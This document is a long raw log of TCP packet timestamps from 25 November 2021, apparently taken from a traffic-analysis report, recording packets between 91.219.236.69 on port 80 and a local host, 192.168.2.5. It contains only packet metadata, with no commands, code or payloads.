                                                                                                                                                  Nov 25, 2021 18:24:13.735033989 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735064983 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735085964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735106945 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735122919 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735140085 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735143900 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735155106 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735167980 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735174894 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735193968 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735212088 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735229015 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735246897 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735253096 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735264063 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735282898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735300064 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735318899 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735322952 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735331059 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735337019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735357046 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735375881 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735394001 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735414982 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735419989 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735429049 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735433102 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735452890 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735471964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735490084 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735507011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735512972 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735519886 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735526085 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735543013 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735559940 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735577106 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735594988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735610962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735610962 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735618114 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735627890 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735645056 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735661030 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735677004 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735692978 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735702038 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735706091 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735709906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735721111 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735726118 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735728979 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735745907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735761881 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.735805035 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.735812902 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.745141983 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.745177031 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.745203972 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.745222092 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.745244980 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.745273113 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.758690119 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.758723974 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.758745909 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.758761883 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.758805037 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.758847952 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.775923014 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.775984049 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776009083 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776032925 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776031971 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776063919 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776113033 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776138067 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776151896 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776164055 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776170015 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776190996 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776199102 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776209116 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776227951 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776240110 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776249886 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776268959 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776273012 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776288033 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776305914 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776309967 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776323080 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776340961 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776345015 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776359081 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776376963 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776385069 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776396036 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776413918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776421070 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776432037 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776449919 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776453018 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776468039 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776484966 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776489973 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776504040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776523113 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776526928 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776540995 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776557922 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776559114 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776577950 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776595116 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776611090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776624918 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776628017 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776647091 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776659012 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776664019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776679993 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776680946 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776699066 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776714087 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.776720047 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.776770115 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.786632061 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.786658049 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.786674023 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.786688089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.786746025 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.786801100 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.799576998 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799604893 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799619913 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799637079 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799655914 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799663067 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.799671888 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799688101 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.799695015 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.799729109 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.815365076 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815392971 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815411091 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815428019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815444946 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815462112 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815475941 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.815473080 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.815514088 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.815989971 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816014051 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816030025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816046953 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816059113 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816063881 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816082001 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816082954 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816097021 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816116095 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816134930 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816278934 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816298962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816318035 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816334963 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816344976 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816353083 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816370964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816380024 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816385031 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816411018 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816452026 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816471100 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816494942 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816517115 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816540003 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816554070 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816565037 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816579103 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816587925 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816610098 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816627026 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.816628933 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816646099 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.816678047 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817096949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817130089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817150116 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817171097 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817176104 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817190886 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817200899 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817223072 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817239046 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817250967 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817260981 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817279100 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817281008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817301989 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817317009 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.817332029 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.817363024 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.828012943 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.828048944 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.828073025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.828089952 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.828183889 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.840887070 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.840915918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.840933084 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.840946913 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.841003895 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856163025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856189013 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856205940 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856223106 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856240034 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856256962 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856257915 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856273890 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856297970 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856360912 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856379986 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856399059 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856404066 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856412888 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856434107 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856817007 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856877089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856875896 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856899023 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856913090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856925964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856940985 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856956959 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856957912 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856973886 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.856975079 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.856992960 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857011080 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857019901 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857031107 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857037067 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857049942 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857067108 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857070923 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857085943 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857100964 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857103109 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857120991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857136011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857147932 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857152939 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857171059 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857172966 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857187986 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857201099 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857206106 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857223988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857242107 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857253075 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857254982 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857283115 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857796907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857816935 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857832909 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857851028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857862949 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857870102 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857883930 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857888937 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857903957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857912064 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857920885 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857937098 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857949972 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.857954979 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857968092 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.857971907 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.858067989 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.868690968 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.868721962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.868745089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.868773937 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.868813038 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.868863106 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.888657093 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.888696909 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.888720036 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.888737917 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.888786077 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.888828993 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.898518085 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898555040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898581982 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898607969 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898608923 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.898633003 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898643970 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.898660898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898680925 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898705959 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.898705959 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.898735046 CET804976791.219.236.69192.168.2.5
